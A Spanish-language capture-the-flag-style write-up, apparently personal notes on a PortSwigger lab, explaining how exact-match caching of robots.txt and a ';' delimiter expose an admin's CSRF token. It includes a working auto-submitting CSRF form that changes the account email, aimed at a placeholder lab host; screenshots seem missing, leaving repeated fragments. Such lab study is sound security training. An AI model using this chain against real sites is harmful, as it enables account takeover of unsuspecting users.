⚽Laboratorio: Explotación de reglas de caché de coincidencia exacta para el engaño de caché web

<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="anything%40web-security-academy.net">
</form>
<script>
document.forms[0].submit();
</script> Esto indica que la memoria caché tiene una regla para almacenar respuestas según el /robots.txt nombre del archivo →
/robots.txt nombre del archivo →

Ya encontramos el delimitador, tal parece que es ; → Así es como el server de origen reconoce hasta change-email mientras que la caché guarda la info en robots.txt, con base en ello iniciaremos lo demás del ataque.
; → Así es como el server de origen reconoce hasta change-email mientras que la caché guarda la info en robots.txt, con base en ello iniciaremos lo demás del ataque.

Obtuvimos el token de admin →



Generamos CSRF POC CON BURP →





PreviousLaboratorio: Explotación de la normalización del servidor de caché para el engaño de la caché webNextAPI Testing
Last updated